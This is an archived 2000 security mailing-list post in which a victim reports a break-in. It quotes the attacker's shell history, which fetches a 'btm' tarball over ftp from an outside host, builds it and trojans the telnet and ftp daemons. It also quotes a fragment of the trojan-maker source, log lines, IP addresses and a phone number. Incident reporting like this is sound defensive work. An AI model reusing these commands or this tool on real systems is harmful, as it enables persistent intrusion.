Security Incidents mailing list archives
succesful crack
From: bjlockie () NORTELNETWORKS COM (Bob Lockie)
Date: Tue, 15 Feb 2000 14:59:24 -0500
rjlockie () home net
(613) 765-5409
My box (24.112.89.219) was cracked.
The attack originated from 24.11.98.152 (c505000-a.blfld1.ct.home.com).
It could be this machine was also cracked and it was used as a launching point.
Please contact the owner and have a talk with them.
The owner should definitely not offer anonymous ftp service.
A few things were left on my system.
drwxr-xr-x 2 root root 1024 Feb 13 22:03 ADMROCKS
I have no /etc/host.allow or /etc/hosts.deny files anymore.
This was in /tmp/,bash_history.
ftp 24.11.98.152
tar -xvf btm.tar
make
./btm /usr/sbin/in.telnetd
./btm /usr/sbin/in.ftpd
rm -rf btm.tar
The following source:
/* bin trojan maker */
#include "btm.h"
#define BTM_VER "btm v1.5"
int options=0;
void usage(char* progname)
{
printf("usage: %s [-d] [-D define line] [-c] [-l max] [-v] [-u compiler]"
" [-o compiler options] target [trojan source]\n",progname);
printf("in trojan source, the trojan function must be:\n");
printf(" "TROJAN_FCT"(char** argv,char** envp)\n");
printf("\n");
printf("-d: debug mode\n");
printf("-c: don't trojan, just put the C file on stdout\n");
printf("-l max: max number of char in a line of the C file\n");
printf("-v: display version\n");
printf("-u compiler: use this compiler\n");
printf("-o options: options for compiler\n");
printf("-n: no save for target file\n");
printf("-e: echo commands\n");
printf("-m comments: put comments in btmized file\n");
printf("\n");
exit(0);
}
int getdirname(char* dirname,char* filename,size_t dirname_size)
{
if (!filename) return -1;
if (filename[0]=='/') {
strncpy(dirname,filename,dirname_size);
*(((char*)strrchr(dirname,'/'))+1)=0;
}
else {
if (!getcwd(dirname,dirname_size)) {
perror("getcwd");
return -1;
}
}
return 0;
}
/var/log/secure
Feb 14 01:04:23 gw PAM_pwdb[6868]: (login) session opened for user tek by (uid=0
)
Feb 14 01:04:25 gw PAM_pwdb[6883]: (su) session opened for user own by tek(uid=5
000)
Bob Lockie
bjlockie () nortelnetworks com
Live long and prosper.
Current thread:
- ports ports and more ports Tyler (Feb 11)
- Re: ports ports and more ports David Getchell (Feb 15)
- Dispostion of UPD/137 packets? Bill Pennington (Feb 15)
- Re: ports ports and more ports Robert Lau (Feb 15)
- succesful crack Bob Lockie (Feb 15)
- Re: succesful crack Gene Harris (Feb 16)
- Re: succesful crack **read nine (Feb 17)
- Re: succesful crack R. Gupta (Feb 17)
- Re: succesful crack Gene Harris (Feb 16)
- Port Scanning (perhaps related to "A very strange port scan") Warren Belfer (Feb 15)
- MASSIVE ssh attack attempt Mark Shirley (Feb 15)
- Re: MASSIVE ssh attack attempt Omachonu Ogali (Feb 16)
- Re: MASSIVE ssh attack attempt Jose Nazario (Feb 17)
- Re: MASSIVE ssh attack attempt Brendan Grieve (Feb 17)
- Re: MASSIVE ssh attack attempt Robert Lau (Feb 16)
- Re: MASSIVE ssh attack attempt David A. Bandel (Feb 17)
- Re: MASSIVE ssh attack attempt Omachonu Ogali (Feb 16)
(Thread continues...)
